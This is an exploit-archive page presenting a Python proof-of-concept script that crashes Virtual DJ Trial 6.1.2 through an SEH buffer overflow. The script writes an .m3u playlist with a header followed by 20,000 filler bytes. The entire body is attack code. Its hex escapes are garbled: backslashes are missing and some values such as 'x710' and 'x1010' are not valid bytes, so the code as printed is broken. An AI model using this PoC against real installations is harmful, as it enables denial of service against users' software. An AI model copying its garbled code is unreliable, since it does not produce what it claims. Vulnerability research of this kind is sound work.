[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Virtual DJ Trial v6.1.2 SEH Buffer Overflow Crash PcC
# Published : 2010-09-05
# Author : Abhishek Lyall
# Previous Title : Novell Netware v6.5 OpenSSH Remote Stack Overflow
# Next Title : FCrackZip 1.0 Local Buffer Overflow Proof of Concept


#Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC
#vulnerble application link http://www.virtualdj.com/download/trial.html
#tested on XP SP2
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web - http://www.aslitsecurity.com/
#blog - http://www.aslitsecurity.blogspot.com/
#!/usr/bin/python

filename = "crash.m3u"


head = (
"x23x56x69x72x710x75x61x6Cx1010x10Ax20x50x6Cx61x79x6C"   
"x69x73x710x0Dx0Ax23x10Dx69x78x510x79x70x65x3Dx53x6D"
"x61x72x710x0Dx0Ax109x3Ax5C"
)


junk = "x41" * 20000



textfile = open(filename , 'w')
textfile.write(head+junk)
textfile.close()